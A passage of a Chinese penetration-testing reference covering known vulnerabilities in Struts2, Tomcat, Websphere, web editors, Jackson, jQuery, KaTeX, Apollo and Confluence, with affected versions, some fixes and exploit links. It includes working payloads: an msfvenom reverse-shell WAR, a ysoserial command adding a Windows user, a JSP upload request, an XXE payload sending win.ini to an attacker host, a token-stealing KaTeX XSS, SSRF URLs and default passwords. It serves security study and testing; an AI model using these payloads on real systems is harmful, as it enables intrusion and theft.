  • 修复方案1. 官方已经发布版本更新,尽快升级到不受影响的版本(Struts 2.3.32 或 Struts 2.5.10.1),建议在升级前做好数据备份.2. 临时修复方案 在用户不便进行升级的情况下,作为临时的解决方案,用户可以进行以下操作来规避风险:在 WEB-INF/classes 目录下的 struts.xml 中的 struts 标签下添加<constant name="struts.custom.i18n.resources" value="global" /> 在 WEB-INF/classes/ 目录下添加 global.properties,文件内容如下:struts.messages.upload.error.InvalidContentTypeException=1
  • POC | Payload | exp- mazen160/struts-pwn

S2-048 & CVE-2017-9791

S2-052 & CVE-2017-9805

  • https://cwiki.apache.org/confluence/display/WW/S2-052
  • 描述启用 Struts REST 插件并使用 XStream 组件对 XML 进行反序列操作时,未对数据内容进行有效验证,可被攻击者进行远程代码执行攻击(RCE)。
  • 影响版本- Struts 2.1.6 ~ 2.3.33- Struts 2.5 ~ 2.5.12
  • POC | Payload | exp- mazen160/struts-pwn_CVE-2017-9805

S2-053 & CVE-2017-12611

  • https://cwiki.apache.org/confluence/display/WW/S2-053
  • 描述当开发者在 Freemarker 标签中使用如下代码时 <@s.hidden name=”redirectUri” value=redirectUri /><@s.hidden name=”redirectUri” value=”${redirectUri}” /> Freemarker 会将值当做表达式进行执行,最后导致代码执行。
  • 影响版本- Struts 2.0.0 ~ 2.3.33- Struts 2.5 ~ 2.5.10.1
  • POC | Payload | exp- brianwrf/S2-053-CVE-2017-12611

S2-055 & CVE-2017-7525

  • https://cwiki.apache.org/confluence/display/WW/S2-055
  • 描述2017年12月1日,Apache Struts 发布最新的安全公告,Apache Struts 2.5.x REST 插件存在远程代码执行的中危漏洞,漏洞编号与 CVE-2017-7525 相关。漏洞的成因是由于使用的 Jackson 版本过低在进行 JSON 反序列化的时候没有任何类型过滤导致远程代码执行。。
  • 影响版本- Struts 2.5 ~ 2.5.14
  • POC | Payload | exp- iBearcat/S2-055

S2-056 & CVE-2018-1327

  • https://cwiki.apache.org/confluence/display/WW/S2-056
  • 描述S2-056 漏洞发生于 Apache Struts 2的 REST 插件,当使用 XStream 组件对 XML 格式的数据包进行反序列化操作,且未对数据内容进行有效验证时,攻击者可通过提交恶意 XML 数据对应用进行远程 DoS 攻击。
  • 影响版本- Struts 2.1.1 ~ 2.5.14.1
  • POC | Payload | exp- iBearcat/S2-056-XStream

S2-057 & CVE-2018-11776

  • https://cwiki.apache.org/confluence/display/WW/S2-057
  • 描述该漏洞由 Semmle Security Research team 的安全研究员 Man YueMo 发现.该漏洞是由于在 Struts2 开发框架中使用 namespace 功能定义 XML 配置时,namespace 值未被设置且在上层动作配置(Action Configuration)中未设置或用通配符 namespace,可能导致远程代码执行.
  • 影响版本- Struts 2.0.4 ~ 2.3.34- Struts 2.5.0 ~ 2.5.16
  • POC | Payload | exp- Ivan1ee/struts2-057-exp- mazen160/struts-pwn_CVE-2018-11776

S2-059 & CVE-2019-0230

  • https://cwiki.apache.org/confluence/display/WW/S2-059
  • 描述Apache Struts 框架, 会对某些特定的标签的属性值,比如 id 属性进行二次解析,所以攻击者可以传递将在呈现标签属性时再次解析的 OGNL 表达式,造成 OGNL 表达式注入。从而可能造成远程执行代码。
  • 影响版本- Struts 2.0.0 ~ 2.5.20
  • 相关文章- Struts2 S2-059 漏洞分析- CVE-2019-0230 s2-059 漏洞分析
  • POC | Payload | exp- Struts2 S2-059 远程代码执行漏洞(CVE-2019-0230)- ramoncjs3/CVE-2019-0230

S2-061 & CVE-2020-17530

  • https://cwiki.apache.org/confluence/display/WW/S2-061
  • 描述S2-061 是对 S2-059 的绕过,Struts2 官方对 S2-059 的修复方式是加强 OGNL 表达式沙盒,而 S2-061 绕过了该沙盒。该漏洞影响版本范围是 Struts 2.0.0 到 Struts 2.5.25。
  • 相关文章- Struts2 S2-061漏洞分析(CVE-2020-17530)- Struts2 s2-061 Poc分析- 内含POC丨漏洞复现之S2-061(CVE-2020-17530)
  • POC | Payload | exp- Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)- vilPulsar/S2-061

Tapestry

CVE-2021-27850

  • 相关文章- tapestry 未授权远程命令执行漏洞复现
  • POC | Payload | exp- kahla-sec/CVE-2021-27850_POC

Tomcat

官网 : https://tomcat.apache.org/

Tomcat 默认端口为 8080,也可能被改为其他端口,后台管理路径为

/manager/html

,后台默认弱口令 admin/admin、tomcat/tomcat 等,若果配置不当,可通过"Tomcat Manager"连接部署 war 包的方式获取 webshell.

搭建教程

  • Tomcat 搭建

相关文章

  • Tomcat漏洞详解
  • 渗透测试-Tomcat常见漏洞总结
  • Tomcat URL解析差异性导致的安全问题
  • 不安全的中间件-Tomcat

Tips

  • tomcat5 默认有两个角色:tomcat 和 role1。其中账号 both、tomcat、role1 的默认密码都是 tomcat。不过不具备部署应用的权限,默认需要 manager 权限才能够直接部署 war 包.
  • tomcat6 默认没有配置任何用户以及角色,没办法用默认账号登录.
  • tomcat7 与6类似
  • tomcat8 其实从6开始,tomcat 就将默认的用户去掉了
  • 控制台路径 - /manager/status- /manager/html- /host-manager/
  • jar -cf job.war ./job.jsp 生成 war 包
  • 如果应用存在 lfi,可以配合以下几点进一步挖掘信息: - web应用的配置文件可能在 /webapps/[web应用名]/WEB-INF/classes/ 目录下, xxx.properties 后缀的文件。 - properties 字典 : https://github.com/ffffffff0x/AboutSecurity/blob/master/Payload/LFI/Fuzz_properties.txt- tomcat 配置 /Conf/tomcat-users.xml

爆破 Manager APP

Manager 管理平台我们都很熟悉,也是最常见的,包含多个管理模块,开启后方便开发及运维人员对 tomcat 项目发布进行管理。Manager 管理平台默认安装后是没有设置登录口令的,需要在 tomcat-user.xml 文件中进行配置,与上文的 admin 管理平台相同。

在登录 manager 后台时,tomcat 使用的是 Basic 认证方式,在请求的数据包中包含一个 Authorization 字段,该字段的值为账号密码的 base64 编码,口令形式为 username:password

Tomcat manager 包含 4 个不同的角色:

  • manager-gui:允许访问 html 页面接口 (即 URL 路径为 / manager/html/*)
  • manager-script:允许访问纯文本接口 (即 URL 路径为 / manager/text/*)
  • manager-jmx:允许访问 JMX 代理接口 (即 URL 路径为 / manager/jmxproxy/*)
  • manager-status:允许访问 Tomcat 只读状态页面 (即 URL 路径为 / manager/status/*) 其中 manager-gui、manager-script、manager-jmx 三个角色均具备 manager-status 角色的权限,即这三种角色权限无需再额外添加 manager-status 权限。实际使用中只需配置 manager-gui 角色通过 html 页面的形式访问管理平台。

manager-jmx

Tomcat 使用 JMX 管理方式,在 Tomcat 的自带应用 manager 就是使用了 JMX 方式来管理 Tomcat,以此完成 Web 应用的动态部署、启动、停止。在 tomcat 的帮助文档中,提供了下面几种方式发送请求获取相应的信息:

  • query 命令:http://[ip]:[port]/manager/jmxproxy/?qry=
  • get 命令:http:// [ip]:[port]/manager/jmxproxy/?get=
  • set 命令:http:// [ip]:[port]/manager/jmxproxy/?set=
  • invoke 命令:http:// [ip]:[port]/manager/jmxproxy/?invoke= 访问上面的地址,我们就可以看到不同的信息,通过向不同的参数传递特定的参数,也可以获取到一些敏感信息。不加参数时查询到的是所有的 MBeans 的内容,加参数之后就可以查看到具体的 MBeans 的内容。

例如: http://[ip]:[port]/manager/jmxproxy/?qry=%3atype=User%2c

该查询可以看到设置的 tomcat-user.xml 中配置的账号密码,甚至还可以通过 set 命令修改账号密码,来设置一个后门账号。

War

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f war > reverse.war
strings reverse.war | grep jsp # in order to get the name of the file

样例目录 session 操纵漏洞

Tomcat 在安装部署后,在 webapps 默认存在一个 examples 目录,该目录正如其文件名一样,提供一些示例应用让使用者来了解 Tomcat 的特性及功能。这些样例在业务上线后并没有什么用处,建议部署 tomcat 后,删除其中的样例文件(ROOT, balancer,jsp-examples, servlet-examples, tomcat-docs, webdav),避免信息泄露和其他潜在的安全风险。

这些样例中的 session 样例(/examples/servlets/servlet/SessionExample)允许用户对 session 进行操纵,因为 session 是全局通用的,所以用户可以通过操纵 session 获取管理员权限,存在一定的安全风险,不过这种基本上只有在一些比较老的不安全系统中才有可能出现,利用条件比较苛刻。

  • 相关文章 - Apache Tomcat样例目录session操纵漏洞

CVE-2016-1240

  • 描述10月1日,Tomcat 爆出了一个本地提权漏洞。通过该漏洞,攻击者可以通过一个低权限的 Tomcat 用户获得系统的 root 权限。
  • 影响版本- tomcat:6.0:- tomcat:7.0:- tomcat:8.0:*
  • POC | Payload | exp- Apache Tomcat 8/7/6 (Debian-Based Distros) - Local Privilege Escalation

CVE-2016-8735

  • 描述Oracle 修复了 JmxRemoteLifecycleListener 反序列化漏洞(CVE-2016-3427)。 Tomcat 也使用了 JmxRemoteLifecycleListener 这个监听器,但是 Tomcat 并没有及时升级,存在这个远程代码执行漏洞。
  • 漏洞利用条件外部需要开启 JmxRemoteLifecycleListener 监听的 10001 和 10002 端口来实现远程代码执行。
  • 影响版本- Tomcat 9.0.0.M1 ~ 9.0.0.M11- Tomcat 8.5.0 ~ 8.5.6- Tomcat 8.0.0.RC1 ~ 8.0.38- Tomcat 7.0.0 ~ 7.0.72- Tomcat 6.0.0 ~ 6.0.47
  • 相关文章- 复现tomcat远程代码执行漏洞(CVE-2016-8735) | 回忆飘如雪- CVE-2016-8735环境搭建到POC编写
  • POC | Payload | expjava -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit 192.168.48.211 10001 Groovy1 "C:\Windows\System32\net.exe user test 12345 /add "

CVE-2017-12615/12616

  • 描述2017年9月19日,Apache Tomcat 官方确认并修复了两个高危漏洞,漏洞 CVE 编号:CVE-2017-12615 和 CVE-2017-12616,该漏洞受影响版本为7.0.0-7.0.80之间,官方评级为高危,在一定条件下,攻击者可以利用这两个漏洞,获取用户服务器上 JSP 文件的源代码,或是通过精心构造的攻击请求,向用户服务器上传恶意 JSP 文件,通过上传的 JSP 文件 ,可在用户服务器上执行任意代码,从而导致数据泄露或获取服务器权限,存在高安全风险.- CVE-2017-12615:远程代码执行漏洞当 Tomcat 运行在 Windows 操作系统时,且启用了 HTTP PUT 请求方法 (例如,将 readonly 初始化参数由默认值设置为 false) ,攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行.导致服务器上的数据泄露或获取服务器权限.- CVE-2017-12616:信息泄露漏洞当 Tomcat 中启用了 VirtualDirContext 时,攻击者将能通过发送精心构造的恶意请求,绕过设置的相关安全限制,或是获取到由 VirtualDirContext 提供支持资源服务的 JSP 源代码,从而造成代码信息泄露.
  • 漏洞利用条件- CVE-2017-12615 漏洞利用需要在 Windows 环境,且需要将 readonly 初始化参数由默认值设置为 false,经过实际测试,Tomcat 7.x 版本内 web.xml 配置文件内默认配置无 readonly 参数,需要手工添加,默认配置条件下不受此漏洞影响.- CVE-2017-12616 漏洞需要在 server.xml 文件配置 VirtualDirContext 参数,经过实际测试,Tomcat 7.x 版本内默认配置无 VirtualDirContext 参数,需要手工添加,默认配置条件下不受此漏洞影响.
  • 影响版本- CVE-2017-12615 影响版本 : Apache Tomcat 7.0.0 ~ 7.0.79 (windows 环境)- CVE-2017-12616 影响版本 : Apache Tomcat 7.0.0 ~ 7.0.80
  • 相关文章- CVE-2017-12615/CVE-2017-12616:Tomcat信息泄漏和远程代码执行漏洞分析报告
  • POC | Payload | exp- iBearcat/CVE-2017-12615- breaktoprotect/CVE-2017-12615PUT /1.jsp/ HTTP/1.1Host: your-ip:8080Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 5<% out.write("<html><body><h3>[+] JSP upload successfully.</h3></body></html>"); %>

CVE-2017-12617

  • 描述运行启用了 HTTP PUT 的 Apache Tomcat 特定版本时(例如,通过将默认 servlet 的只读初始化参数设置为 false)可以通过特制请求将 JSP 文件上载到服务器。然后可以请求此 JSP,并且服务器将执行其中包含的所有代码。
  • 影响版本- Apache Tomcat 7.0.0 ~ 7.0.81- Apache Tomcat 8.0.0 ~ 8.0.17
  • 相关文章- CVE-2017-12617-Tomcat远程代码执行漏洞复现测试
  • POC | Payload | exp- cyberheartmi9/CVE-2017-12617
  • MSF Moduleuse exploit/multi/http/tomcat_jsp_upload_bypass

CVE-2018-11784 Tomcat URL跳转漏洞

  • 描述当 Apache Tomcat 版本 9.0.0.M1 到 9.0.11、8.5.0 到 8.5.33 和 7.0.23 到 7.0.90 中的默认 servlet 返回到一个目录的重定向(例如,当用户请求'/foo'时重定向到'/foo/’),一个特制的 URL 可用于导致重定向生成到攻击者选择的任何 URI。
  • 影响版本- Apache Tomcat 9.0.0.M1 ~ 9.0.11- Apache Tomcat 8.5.0 ~ 8.5.33- Apache Tomcat 7.0.23 ~ 7.0.90
  • 相关文章- Tomcat URL跳转漏洞【CVE-2018-11784】
  • POC | Payload | exphttp://[ip:port]//[baidu.com]/..;/[可访问目录/可访问目录]默认存在的 docs 目录也可以被利用,例http://[ip:port]//[baidu.com]/..;/docs/images

CVE-2019-0232

  • 描述该漏洞是由于 Tomcat CGI 将命令行参数传递给 Windows 程序的方式存在错误,使得 CGIServlet 被命令注入影响。该漏洞只影响 Windows 平台,要求启用了 CGIServlet 和 enableCmdLineArguments 参数。但是 CGIServlet 和 enableCmdLineArguments 参数默认情况下都不启用。
  • 影响版本- Apache Tomcat 7.0.0 ~ 7.0.93- Apache Tomcat 8.0.0 ~ 8.5.39- Apache Tomcat 9.0.1 ~ 9.0.17
  • 相关文章- CVE-2019-0232:Apache Tomcat RCE漏洞分析- 复现CVE-2019-0232过程中遇到的坑 Apache Tomcat高危远程代码执行漏洞
  • POC | Payload | exp- pyn3rd/CVE-2019-0232- jas502n/CVE-2019-0232

CVE-2020-1938 && CNVD-2020-10487 Apache Tomcat Ghostcat 漏洞

  • 描述Apache Tomcat 会开启 AJP 连接器,方便与其他 Web 服务器通过 AJP 协议进行交互。由于 Tomcat 本身也内含了 HTTP 服务器,因此也可以视作单独的 Web 服务器。但 Apache Tomcat在 AJP 协议的实现上存在漏洞,导致攻击者可以通过发送恶意的 AJP 请求,可以读取或者包含 Web 应用根目录下的任意文件,如果配合文件上传任意格式文件,将可能导致任意代码执行(RCE).该漏洞利用 AJP 服务端口实现攻击,未开启 AJP 服务对外不受漏洞影响(tomcat 默认将 AJP 服务开启并绑定至 0.0.0.0/0)。此漏洞为文件包含漏洞,攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件、源代码等。
  • 影响版本- Apache Tomcat = 6- 7 <= Apache Tomcat < 7.0.100- 8 <= Apache Tomcat < 8.5.51- 9 <= Apache Tomcat < 9.0.31
  • 相关文章- 【WEB安全】Tomcat-Ajp协议漏洞分析- 如何更加精准地检测AJP协议文件包含漏洞(CVE-2020-1938)- 不调试源码重现 Ghostcat 漏洞 (CVE-2020-1938)- CVE-2020-1938:Tomcat AJP文件包含漏洞分析
  • POC | Payload | exp- 0nise/CVE-2020-1938- YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
  • 修复建议- 请尽快更新 Tomcat 到安全版本。- 临时禁用 AJP 协议端口,打开 Tomcat 配置文件 <CATALINA_BASE>/conf/service.xml,注释掉如下行:<Connector port="8009" protocol="AJP/1.3" redirectPort="8443" /> 修改完后,重启 tomcat 即可。- 除以上措施外,也可采用防火墙等方法阻止不可信任的来源访问 Tomcat AJP Connector 端口。

tomcat cluster sync-session

  • 描述tomcat 使用了自带 session 同步功能时,不安全的配置(没有使用 EncryptInterceptor)导致存在的反序列化漏洞,通过精心构造的数据包,可以对使用了 tomcat 自带 session 同步功能的服务器进行攻击。
  • POC | Payload | exp- threedr3am/tomcat-cluster-session-sync-exp

CVE-2020-9484 Session 反序列化代码执行漏洞

  • 描述当使用 tomcat 时,如果使用了 tomcat 提供的 session 持久化功能,如果存在文件上传功能,恶意请求者通过一个流程,将能发起一个恶意请求造成服务端远程命令执行。
  • 相关文章- CVE-2020-9484 Tomcat RCE漏洞分析- CVE-2020-9484: Apache Tomcat Remote Code Execution Vulnerability Alert
  • POC | Payload | exp- IdealDreamLast/CVE-2020-9484- masahiro331/CVE-2020-9484

CVE-2020-13935

  • 描述Apache Tomcat 中的 WebSocket 存在安全漏洞,该漏洞源于程序没有正确验证 payload 的长度。攻击者可利用该漏洞造成拒绝服务(无限循环)。
  • 影响版本- Apache Tomcat 10.0.0-M1-10.0.0-M6- Apache Tomcat 9.0.0.M1-9.0.36- Apache Tomcat 8.5.0-8.5.56- Apache Tomcat 7.0.27-7.0.104
  • 相关文章- CVE-2020-13935复现与浅析
  • POC | Payload | exp- RedTeamPentesting/CVE-2020-13935CVE-2020-13935.exe ws://x.x.x.x:xxxx/examples/websocket/echoStrreamAnnotation

uWSGI

uWSGI 未授权访问漏洞


Weblogic

  • Weblogic

Websphere

CVE-2014-0910

  • POC | Payload | exp - IBM Websphere Portal - Persistent Cross-Site Scripting

CVE-2015-7450

  • POC | Payload | exp - websphere_rce.py- websphereCVE-2015-7450

CVE-2019-4279 Websphere ND远程命令执行

  • 相关文章 - Websphere ND远程命令执行分析以及构造RpcServerDispatcher Payload(CVE-2019-4279)

CVE-2020-4643 WebSphere XXE 漏洞

  • 相关文章- WebSphere XXE 漏洞分析(CVE-2020-4643)
  • POC | Payload | expxml如下:<!DOCTYPE x [<!ENTITY % aaa SYSTEM "file:///C:/Windows/win.ini"><!ENTITY % bbb SYSTEM "http://yourip:8000/xx.dtd">%bbb;]><definitions name="HelloService" xmlns="http://schemas.xmlsoap.org/wsdl/">&ddd;</definitions>xx.dtd如下:<!ENTITY % ccc '<!ENTITY ddd '<import namespace="uri" location="http://yourip:8000/xxeLog?%aaa;"/>'>'>%ccc;

Websphere Portal ssrf

  • 相关文章 - Turning bad SSRF to good SSRF: Websphere Portal

组件

编辑器

手册

  • 编辑器漏洞手册

ewebeditor

官网 : http://www.ewebeditor.net/

相关文章

  • ewebeditor 编辑器漏洞总结

常用路径

Admin_Login.asp
Admin_Default.asp
Admin_Style.asp
Admin_UploadFile.asp
Upload.asp
Admin_ModiPwd.asp
eWebEditor.asp
db/ewebeditor.mdb
ewebeditor/login_admin.asp
eweb/login_admin.asp
editor/login_admin.asp

FCKeditor

官网 : https://ckeditor.com/

相关文章

  • Fckeditor上传漏洞利用拿shell总结

常用路径

FCKeditor/_samples/default.html
FCKeditor/_whatsnew.html
fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.test.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp

.net 目录遍历

/FCkeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=

kindeditor

官网 : http://kindeditor.net/

kindeditor<=4.1.5 上传漏洞

  • 相关文章- kindeditor<=4.1.5上传漏洞复现- 大批量Kindeditor文件上传事件的漏洞分析
  • 漏洞修复1. 直接删除 upload_json.*file_manager_json.*2. 升级 kindeditor 到最新版本

ueditor

相关文章

  • 百度Ueditor编辑器漏洞总结

ueditor ssrf

  • 相关文章- UEditor 1.4.3.3验证SSRF漏洞提高DNS rebinding成功率- 九维团队-绿队(改进)| Java代码审计之SSRF
  • POC | Payload | exp/ueditor/jsp/getRemoteImage.jsp?upfile=http://127.0.0.1/favicon.ico?.jpg/module/ueditor/php/controller.php?action=catchimage&source%5b%5d=http://www.baidu.com"/module/ueditor/jsp/controller.jsp?action=catchimage&source%5b%5d=http://www.baidu.com"

CNVD-2017-20077 ueditor 上传漏洞

  • 相关文章- UEditor编辑器两个版本任意文件上传漏洞分析- 【漏洞预警】UEditor编辑器任意文件上传可getshell- Ueditor编辑器漏洞(文件上传)- ueditor(v1.4.3)文件上传getshell实战复现- 当ueditor遇到某盾
  • POC | Payload | exp- theLSA/ueditor-getshell

序列化

相关文章

  • 无损检测Fastjson DoS漏洞以及盲区分Fastjson与Jackson组件

fastjson

  • fastjson

Jackson

FasterXML Jackson 是美国 FasterXML 公司的一款适用于 Java 的数据处理工具。

主要的几个 jar 包:

  • jackson-core : 核心包
  • jackson-annotations : 注解包
  • jackson-databind : 数据绑定包

CVE-2017-7525 Jackson-databind 反序列化漏洞

  • 描述Jackson-databind 支持 Polymorphic Deserialization 特性(默认情况下不开启),当 json 字符串转换的 Target class 中有 polymorph fields,即字段类型为接口、抽象类或 Object 类型时,攻击者可以通过在 json 字符串中指定变量的具体类型 (子类或接口实现类),来实现实例化指定的类,借助某些特殊的 class,如 TemplatesImpl,可以实现任意代码执行。
  • 相关文章- Jackson-databind 反序列化漏洞(CVE-2017-7525)

CVE-2017-17485 Jackson-databind 反序列化

  • 描述FasterXML Jackson 是美国 FasterXML 公司的一款适用于 Java 的数据处理工具。jackson-databind 是其中的一个具有数据绑定功能的组件。FasterXML Jackson-databind 2.8.10 及之前版本和 2.9.x 版本至 2.9.3 版本中存在代码问题漏洞。远程攻击者可通过向 ObjectMapper 的 readValue 方法发送恶意制作的 JSON 输入并绕过黑名单利用该漏洞执行代码。
  • 相关文章- CVE-2017-17485 Jackson-databind 反序列化

CVE-2019-12086

  • 描述使用了 jackson-databind 2.x before 2.9.9 的 Java 应用,如果 ClassPath 中有 com.mysql.cj.jdbc.admin.MiniAdmin(存在于 MySQL 的 JDBC 驱动中)这个类,那么 Java 应用所在的服务器上的文件,就可能被任意读取并传送到恶意的MySQL Server。
  • 相关文章- 分析Jackson的安全漏洞CVE-2019-12086

CVE-2019-12384 Jackson-databind RCE And SSRF

  • 描述6月21日,Redhat 官方发布 jackson-databind 漏洞(CVE-2019-12384)安全通告,多个 Redhat 产品受此漏洞影响,CVSS 评分为 8.1,漏洞利用复杂度高。7月22日,安全研究员 Andrea Brancaleoni 对此漏洞进行分析,并公布了该漏洞的分析文章。该漏洞是由于 Jackson 黑名单过滤不完整而导致,当开发人员在应用程序中通过 ObjectMapper 对象调用 enableDefaultTyping 方法时,程序就会受到此漏洞的影响,攻击者就可利用构造的包含有恶意代码的 json 数据包对应用进行攻击,直接获取服务器控制权限。
  • 影响版本- Jackson-databind 2.X < 2.9.9.1
  • 相关文章- CVE-2019-12384:Jackson反序列化漏洞分析- Jackson CVE-2019-12384 RCE 复现记录
  • POC | Payload | exp- jas502n/CVE-2019-12384- MagicZer0/Jackson_RCE-CVE-2019-12384

CVE-2020-8840 FasterXML/jackson-databind 远程代码执行漏洞

  • 影响版本- Jackson-databind 2.X < 2.9.10.2
  • POC | Payload | exp- jas502n/CVE-2020-8840

CVE-2020-9547 FasterXML/jackson-databind 远程代码执行漏洞

  • 影响版本- Jackson-databind 2.X < 2.9.10.4
  • POC | Payload | exp- fairyming/CVE-2020-9547

CVE-2020-9548 FasterXML/jackson-databind 远程代码执行漏洞

  • 影响版本- Jackson-databind 2.X < 2.9.10.4
  • POC | Payload | exp- fairyming/CVE-2020-9548

CVE-2020-11113 远程代码执行漏洞

  • 影响版本- Jackson-databind < 2.9.10.4
  • 相关文章- Jackson-databind-2670远程代码执行漏洞简单分析

CVE-2020-35728

  • POC | Payload | exp - Al1ex/CVE-2020-35728

CVE-2020-36179 Jackson-databind SSRF&RCE

  • 影响版本- Jackson-databind < 2.9.10.7
  • 相关文章- CVE-2020-36179:Jackson-databind SSRF&RCE
  • POC | Payload | exp- Al1ex/CVE-2020-36179

Xstream

相关文章

  • XStream反序列化组件攻击分析

CVE-2020-26217

CVE-2020-26258

CVE-2020-26259 任意文件删除

CVE-2021-29505

  • 相关文章 - CVE-2021-29505:XStream反序列化命令执行漏洞复现

JavaScript库

jQuery

检测工具

  • jQuery versions with known weaknesses - 在线查找已知版本的 jQuery 漏洞
  • mahp/jQuery-with-XSS将代码中 src 后的链接修改为自己要验证的 js 地址链接。

CVE-2020-11022/11023 jQuery XSS漏洞

  • 详情在大于或等于 1.2 且在 3.5.0 之前的 jQuery 版本中,即使执行了消毒(sanitize)处理,也仍会执行将来自不受信任来源的 HTML 传递给 jQuery 的 DOM 操作方法(即 html()、.append() 等),从而导致 xss 漏洞。
  • CVE-2020-11022/CVE-2020-11023: jQuery 3.5.0 Security Fix details
  • jQuery XSS漏洞 CVE-2020-11022/11023

CVE-2018-9206 jQuery-File-Upload 未授权任意文件上传漏洞

  • 相关文章- CVE-2018-9206渗透实战- jQuery-File-Upload—三个漏洞的故事
  • POC | Payload | exp- Stahlz/JQShell- Den1al/CVE-2018-9206

KaTeX

xss

  • 相关链接- [CRITICAL BUG] Inject any html/css/js by using KaTeX · Issue #1160 · KaTeX/KaTeX- [BUG] Injecting arbitrary code into webapp by exploiting KaTeX (#1859) · Issues · GitLab.org / gitter / webapp · GitLab- Gitter XSS Crypto Mining Security Issue Notification
  • 案例- Sec-IN社区安全测试——文章正文XSS
  • POC | Payload | exp$$ \<script id="iplog">x=new XMLHttpRequest(); x.open("GET","https://afternoon-fjord-12487.herokuapp.com/");x.send();document.getElementById("id").parent.parent.style = "display:none"</script> $$``````$$ \<input type=image src=/static/css/img/logo.23d7be3.svgonload=alert(localStorage.access_token)> $$

其他

AjaxPro.NET

CVE-2021-23758 AjaxPro.NET反序列化漏洞

  • 相关文章 - 开源组件漏洞之CVE-2021-23758 AjaxPro.NET反序列化漏洞

exiftool

CVE-2021-22204

  • 相关案例 - Remote Code Execution via VirusTotal Platform

Ghostscript

CVE-2019-6116 沙箱绕过(命令执行)漏洞

  • POC | Payload | exp - GhostScript 沙箱绕过(命令执行)漏洞(CVE-2019-6116)

GhostScript-9.50 RCE

  • 相关文章- Ghostscript沙箱绕过(CVE-2021-3781)分析
  • POC | Payload | exp- duc-nt/RCE-0-day-for-GhostScript-9.50

ImageMagick

CVE-2016-3714

Log4j

  • Log4j

PrimeFaces

CVE-2017-1000486

  • 相关文章- PrimeFaces and EL Injection Update
  • POC | Payload | exp- pimps/CVE-2017-1000486

webuploader

项目地址 : https://github.com/fex-team/webuploader

webuploader-v-0.1.15 组件存在文件上传漏洞(未授权)

  • POC | Payload | exp - jas502n/webuploader-0.1.15-Demo

dompdf

dompdf-rce

  • 相关文章- 利用dompdf将XSS升级为RCE
  • POC | Payload | exp- positive-security/dompdf-rce - RCE exploit for dompdf

服务

相关文章

  • DevOps风险测绘之代码篇

Adminer

Adminer≤4.6.2任意文件读取漏洞

  • 相关文章 - Adminer≤4.6.2任意文件读取漏洞

ApiSix

CVE-2021-43557 Request Uri目录穿越漏洞

  • 相关文章- Apache ApiSix Request Uri目录穿越漏洞复现(CVE-2021-43557)
  • POC | Payload | exp- xvnpw/k8s-CVE-2021-43557-poc

CVE-2021-45232 Apache APISIX Dashboard 认证绕过漏洞

  • 相关文章 - CVE-2021-45232 Apache APISIX Dashboard 认证绕过漏洞分析- CVE-2021-45232分析(APISIX网关未授权访问)

Apollo

项目地址 : https://github.com/apolloconfig/apollo

fofa : icon_hash="11794165"
fofa : title="Apollo配置中心"
fofa : body="apollo-adminservice"

未授权访问

  • 相关文章- Apollo 配置中心未授权获取配置漏洞利用
  • POC | Payload | exp# apollo-adminservice# 1. 获取所有的应用基本信息(包含 appId)xxx.xxx.xxx.xxx:8090/apps# apollo-adminservice# 2. 获取相关 appId 的所有 clusterxxx.xxx.xxx.xxx:8090/apps/<appId>/clusters# apollo-adminservice# 3. 获取相关 appId 的 namespacesxxx.xxx.xxx.xxx:8090/apps/<appId>/appnamespaces# apollo-configservice# 4. 组合 appId cluster namespaceName 获取配置 configurationsxxx.xxx.xxx.xxx:8080/configs/<appId>/<cluster>/<namespaceName>

AppWeb

CVE-2018-8715 AppWeb认证绕过漏洞

  • 描述其7.0.3之前的版本中,对于 digest 和 form 两种认证方式,如果用户传入的密码为 null(也就是没有传递密码参数),appweb 将因为一个逻辑错误导致直接认证成功,并返回 session。
  • POC | Payload | exp- AppWeb认证绕过漏洞(CVE-2018-8715) - (未复现成功)

Appspace-Core

CVE-2021-27670

  • POC | Payload | exp/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://xxxx.dnslog.cn

Bitbucket

CVE-2022-36804

  • POC | Payload | exp - Bitbucket Server CVE-2022-36804 漏洞分析- notdls/CVE-2022-36804

Cacti

Fofa: app="cacti"

默认密码

admin   admin

CVE-2020-8813 Cacti v1.2.8 远程命令执行漏洞

  • 相关文章- Cacti v1.2.8 authenticated Remote Code Execution (CVE-2020-8813)
  • POC | Payload | exp- mhaskar/CVE-2020-8813

celery

相关文章

  • Celery Redis未授权访问利用

Commvault

CVE-2021-34993

  • 相关文章 - Commvault CVE-2021-34993 从认证绕过到任意文件下载

Confluence

官网 : https://www.atlassian.com/software/confluence

Confluence 是一个专业的企业知识管理与协同软件,也可以用于构建企业 wiki。使用简单,强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。

相关文章

  • Confluence利用指南

相关工具

  • BeichenDream/PostConfluence - 哥斯拉 Confluence 后渗透插件

CVE-2019-3394 Confluence 文件读取漏洞

  • 相关文章 - Confluence 文件读取漏洞(CVE-2019-3394)分析

CVE-2019-3396 Confluence Wiki 远程代码执行

  • 相关文章- Confluence 未授权 RCE (CVE-2019-3396) 漏洞分析
  • POC | Payload | exp- jas502n/CVE-2019-3396- Yt1g3r/CVE-2019-3396_EXP

